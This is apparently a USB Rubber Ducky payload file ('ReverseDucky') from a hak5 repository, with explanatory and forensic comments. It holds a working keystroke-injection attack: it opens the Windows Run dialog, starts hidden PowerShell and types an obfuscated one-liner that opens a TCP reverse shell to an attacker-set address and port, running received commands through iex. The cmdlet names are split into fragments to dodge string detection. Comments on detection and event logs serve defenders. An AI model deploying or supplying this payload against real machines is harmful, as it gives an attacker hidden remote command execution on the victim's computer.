hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
REM ReverseDucky
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0i41E
REM Requirement: DuckyScript 3.0
REM TCP reverse shell executed hidden in the background; the CAPSLOCK light at the end indicates that the payload was executed.
REM Define the attacker IP and PORT in the ADDRESS and PORT DEFINEs (lines 38 & 39 of the original file)
REM DON'T FORGET TO START LISTENER
REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
    REM VERSION 1.0

    REM PURPOSE:
        REM Dynamic boot delay. Presses CAPSLOCK repeatedly until the host
        REM reports the lock as on ($_CAPSLOCK_ON) or until ITERATION_LIMIT
        REM presses have been sent, whichever comes first.

    REM USAGE:
        REM Extension runs inline (here)
        REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
        REM boot delay

    REM TARGETS:
        REM Any system that reflects CAPSLOCK will detect minimum required delay
        REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms

    REM CONFIGURATION:
        REM RESPONSE_DELAY is the pause after each CAPSLOCK press.
        REM ITERATION_LIMIT caps the number of presses; 120 presses with a
        REM delay of 25 each gives the 3000ms ceiling named under TARGETS.
    DEFINE RESPONSE_DELAY 25
    DEFINE ITERATION_LIMIT 120

    REM $C counts the CAPSLOCK presses sent so far.
    VAR $C = 0
    REM Loop ends as soon as the host reflects CAPSLOCK as on, or at the limit.
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
        CAPSLOCK
        DELAY RESPONSE_DELAY
        $C = ($C + 1)
    END_WHILE
    REM One more press after the loop. When the loop ended because the lock
    REM turned on, this press switches it back off.
    CAPSLOCK
    REM NOTE(review): on hosts that reflect CAPSLOCK, the visible effect is a
    REM brief lock toggle right after the device starts typing - confirm on
    REM the target keyboard/LED before relying on it as an indicator.
END_EXTENSION
REM Define the attackers IP & Port
REM ADDRESS and PORT are substituted into the typed one-liner further down.
REM '0.0.0.0' is the placeholder value shipped with this file.
DEFINE ADDRESS '0.0.0.0'
DEFINE PORT 4444

REM Fixed waits between steps so the host UI can keep up with typed input.
DELAY 1500
REM GUI r sends Windows-key + R, which opens the Run dialog on Windows.
GUI r
DELAY 500
REM Typed into the Run dialog. The abbreviated switches are:
REM   -NoP  = -NoProfile
REM   -NonI = -NonInteractive
REM   -w h  = -WindowStyle Hidden
REM Forensics: commands entered through the Run dialog are recorded per user
REM under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
STRINGLN powershell -NoP -NonI -w h
DELAY 500
REM The next line is typed 500 later, presumably into that hidden PowerShell
REM session. What the one-liner does, step by step:
REM   1. Opens a System.Net.Sockets.TCPClient connection to ADDRESS:PORT.
REM   2. Reads from the stream into a 65536-byte buffer until Read returns 0.
REM   3. Decodes each read as ASCII and runs it through iex (Invoke-Expression).
REM   4. Sends the output back, followed by a prompt of the form
REM      'Ducky@PS <current location> > ' (gl is the Get-Location alias).
REM   5. Closes the client and exits once the loop ends.
REM Cmdlet and alias names are assembled from string fragments
REM ('New'+'-Obj'+'ect', 'ie'+'x', 'Out'+'-St'+'ring') and type names use
REM mixed case, so exact-string matching on the typed command text for names
REM such as New-Object or iex will not match.
REM Detection: rely on behaviour rather than literal strings -
REM   - process creation of powershell with a hidden window style and the
REM     abbreviated switches above (Security 4688 / Sysmon Event ID 1),
REM   - an outbound TCP connection made by the PowerShell process
REM     (Sysmon Event ID 3),
REM   - PowerShell Script Block Logging (Event ID 4104) and AMSI, which see
REM     the script content that is actually executed,
REM   - a new USB HID keyboard enumerating shortly before this activity.
STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
REM Final CAPSLOCK press: per the file header, the lock light is the signal
REM that the payload was typed out. It is sent unconditionally, so it does
REM not confirm that the connection was established.
CAPSLOCK